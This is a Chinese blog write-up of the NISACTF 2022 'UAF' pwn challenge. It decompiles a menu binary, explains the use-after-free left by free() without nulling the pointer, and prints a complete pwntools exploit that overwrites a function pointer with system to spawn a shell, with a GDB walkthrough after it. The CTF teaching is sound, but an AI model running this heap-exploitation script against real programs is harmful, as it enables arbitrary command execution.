[NISACTF 2022]UAF

最新推荐文章于 2024-03-08 21:05:14 发布
最新推荐文章于 2024-03-08 21:05:14 发布
阅读量494 收藏
点赞数 1
分类专栏: Pwn 文章标签: python linux 网络安全 学习 网络 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/129436021
版权

跟hacknote一样的做法,但是有所不同。

Checksec & IDA

也是一样的保护机制,直接打开IDA看一眼

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3[4]; // [esp+8h] [ebp-10h] BYREF

  v3[1] = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  while ( 1 )
  {
    while ( 1 )
    {
      puts("1.create");
      puts("2.edit");
      puts("3.delete");
      puts("4.show");
      putchar(58);
      __isoc99_scanf("%d", v3);
      if ( v3[0] != 2 )
        break;
      edit();
    }
    if ( v3[0] > 2 )
    {
      if ( v3[0] == 3 )
      {
        del();
      }
      else if ( v3[0] == 4 )
      {
        show();
      }
      else
      {
LABEL_13:
        puts("Invalid choice");
      }
    }
    else
    {
      if ( v3[0] != 1 )
        goto LABEL_13;
      create();
    }
  }
}
int create()
{
  int result; // eax
  int v1; // ebx
  char *v2; // eax

  printf("you are creating the %d page\n", i);
  result = i;
  if ( i >= 0 )
  {
    result = i;
    if ( i <= 9 )
    {
      v1 = i;
      (&page)[v1] = (char *)malloc(8u);
      if ( i )
      {
        if ( i <= 0 || i > 9 )
        {
          return puts("NO PAGE");
        }
        else
        {
          puts("Good cretation!");
          return ++i;
        }
      }
      else
      {
        v2 = page;
        *(_DWORD *)page = 1868654951;
        v2[4] = 0;
        *((_DWORD *)page + 1) = echo;
        puts("The init page");
        return ++i;
      }
    }
  }
  return result;
}
unsigned int show()
{
  int v1; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  puts("Input page");
  __isoc99_scanf("%d", &v1);
  if ( v1 )
  {
    if ( v1 <= 0 || v1 > i )
      puts("NO PAGE");
    else
      echo((&page)[v1]);
  }
  else
  {
    (*((void (__cdecl **)(char *))page + 1))(page);
  }
  return __readgsdword(0x14u) ^ v2;
}
unsigned int del()
{
  int v1; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  puts("Input page");
  __isoc99_scanf("%d", &v1);
  if ( v1 < 0 || v1 > i )
    puts("NO PAGE");
  else
    free((&page)[v1]);
  return __readgsdword(0x14u) ^ v2;
}
int __cdecl NICO(char *command)
{
  return system(command);
}

主要的函数有:

main/create/show/del/edit/NICO

其中NICO是后门函数,提供了一个system。

显然是一个菜单程序,我们运行然后gdb调试看看。

发现与hacknote相比,我们不能指定堆的大小,并且无法直接更改堆0的内容。

但是我们可以释放堆0。

可以发现edit函数中的if是<0而不是<= 0。并且del函数中没有置零指针。导致了UAF漏洞。

EXP:

利用思路很简单,我们只需要申请一次堆0,然后删除一次堆0,再申请一次堆,因为系统短时间内不会直接回收堆的内存,所以我们申请到的堆1其实就是堆0,我们只需要往堆1里面写入指向shell函数的指针,即可getshell。

from pwn import *

Locale = 1
if Locale == 1:
    io = process('./NUAF')
else:
    io = remote('1.14.71.254',28674)

elf = ELF('./NSS_Pwn')

context(arch='i386', os='linux', log_level='debug')

system = 0x80484E0


def add_chunk():
    io.recvuntil(b':')
    io.sendline(b'1')


def edit_chunk(index, string):
    io.recvuntil(b':')
    io.sendline(b'2')
    io.recvuntil(b'page\n')
    io.sendline(str(index))
    io.recvuntil(b'strings\n')
    io.sendline(string)


def del_chunk(index):
    io.recvuntil(b':')
    io.sendline(b'3')
    io.recvuntil(b'page\n')
    io.sendline(str(index))


def show_chunk(index):
    io.recvuntil(b':')
    io.sendline(b'4')
    io.recvuntil(b'page\n')
    io.sendline(str(index))


# 先创建一个chunk 0
# 由于edit不能直接编辑chunk0,因为 if ( v1 <= 0 || v1 > i )
# 但是由于系统不会直接回收内存空间,并且free后并没有将指针置0
# create函数创建的chunk是不能自定义的,但是我们只要free后再申请一次,它就会把之前的chunk给我们复用
# 但是由于我们不能直接编辑chunk0,但是chunk0现在被page1所调用,因此我们只需要使用edit写入page1 sh并show_page即可getshell

add_chunk()
del_chunk(0)
add_chunk()
edit_chunk(1, b'sh;\x00' + p32(system))

show_chunk(0)

io.interactive()

使用GDB一步一步追踪内存:

首先申请一个堆。add_chunk()

可以发现程序申请了0x10大小的堆,

堆中存放了echo函数的地址,而echo函数调用了puts函数打印字符串s。

然后释放堆。del_chunk(0)

可以发现程序free了刚才申请的堆,将它暂时存放进了tcache。

再申请一次堆。也就是Page 1 add_chunk()

程序复用了刚才释放的堆,也就是堆0。

但是我们发现堆0中什么都没有储存。

将shell和system送入堆。edit_chunk(1, b'sh;\x00' + p32(system))

可以发现堆中内容再次改变,其中0x80484E0是system的plt表地址,3B6873则是sh与\x00。

如果我们不删除堆0,直接更改堆1的内容为b'sh;\x00' + p32(system),还能getshell吗?

实际上是不行的,虽然会创建第二个堆,并且内容和0一模一样,但是会产生一个死循环,让程序永远卡在重复显示菜单。

我也不是很清楚为什么会这样,但是如果使用了UAF漏洞就不会产生死循环这种问题。

Red-Leaves
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 508
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
[NISACTF 2022]下
qq_62046696的博客
07-30 2511
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
【PWN · UAF】[NISACTF 2022]UAF
Mr_Fmnwon的博客
07-22 754
作为本萌新做的第一道堆题,接触到新的领域,总是又能够学到很多东西。本题用到了堆漏洞UAF:use after free。UAF的第一题,Heap的第一题。heap一直都是pwn里的大头,好好学!加油!
buuctf hitcontraining_uaf
cainiao78777的博客
04-12 244
会把指针堆块1重新分配给我们,context堆块会把指针堆块0分配给我们(因为我们申请一个堆块实际上是申请两个堆块(一个指针堆块,一个context堆块))程序是先申请一个指针堆块,这个指针堆块的大小为8字节,前四字节存储的是puts函数的指针,后四字节存储的是要申请的堆块内容指针就是相当于这样。3.打印堆块内容,这段代码会把指针堆块的第一个指针来执行函数,如果把第一个指针修改为后门函数指针,就能getshell。2.释放堆块,这个操作,在释放堆块之后,并未把指针置零,所以存在uaf漏洞。
pwn学习-ctfwiki-UAF
WocW的博客
05-23 2243
源码: #include <stdio.h> #include <stdlib.h> #include <unistd.h> struct note { void (*printnote)(); char *content; }; struct note *notelist[5]; int count = 0; void print_note_co...
[CTF]PWN--堆--UAF漏洞
最新发布
2301_79880752的博客
03-08 1109
UAF即Use After Free简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况。。而我们一般所指的漏洞主要是后两种。此外,
FIDO-UAF协议
12-30
FIDO-UAF协议是一项重要的国际统一认证协议,全称为Fast IDentity Online-Universal Authentication Framework。UAF协议是FIDO(Fast IDentity Online)联盟提出的认证标准之一,旨在解决在线服务中用户身份验证的...
Fido UAF接口文档
02-25
**Fido UAF接口文档详解** Fido UAF(Universal Authentication Framework)是一种强大的身份验证标准,旨在提升在线安全,提供无需密码的强身份验证。它利用本地设备的安全硬件,如指纹传感器、面部识别或PIN码,...
uaf-for-incose
12-11
UAF is the next generation of the Unified Profile for DoDAF and MoDAF (UPDM) At one time referred to as UPDM 3 Longer Answer: An enterprise architecture framework Applicable for domains similar to ...
UAF设计软件
07-07
**UAF42设计软件详解** UAF42(通用音频格式42)是一种专业音频处理技术,主要用于高质量的声音设计和分析。在这个领域,Filter42是一款专为UAF42设计的软件工具,它提供了丰富的功能,允许用户对音频信号进行精确...
uaf42的使用
08-08
### uaf42的使用与特性详解 #### 一、uaf42概述 uaf42是一款由Burr-Brown公司推出的通用滤波器集成电路(IC),它被设计用于简化各种类型的模拟滤波器的设计与实现过程。该IC内部集成了运算放大器(op amps)、匹配...
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2189
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
ADworld pwn wp - hacknote
fa1c4的blog
08-30 197
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
UAF (Use After Free)漏洞分析及利用
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 812
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
[NISACTF 2022]上
qq_62046696的博客
07-26 3948
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
CTF pwn普通UAF题目模板
半岛铁盒的博客
06-15 503
from pwn import * context(log_level=‘debug’) elf=ELF(’./) r=remote("","") #r=process(’./’) def create(size,content): r.sendlineafter("Your choice: ",‘1’) r.sendlineafter("Please input size: ",str(size)) r.sendafter("Please input content: ",content) def del
UAF原理及相关一道CTF
qq_36963214的博客
07-27 2733
前言 通过学习UAF原理及其在CTF中的应用,通过理论是实践相结合,可以更好地掌握UAF漏洞。 UAF漏洞原理 #include<stdio.h> #include<stdlib.h> int main() { char *p1, *p2; p1 = p2 = NULL; p1 = (char *)malloc(10); if (p1 == NULL) { printf("fail to malloc p1"); exit(1); } memcpy(p1, "
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值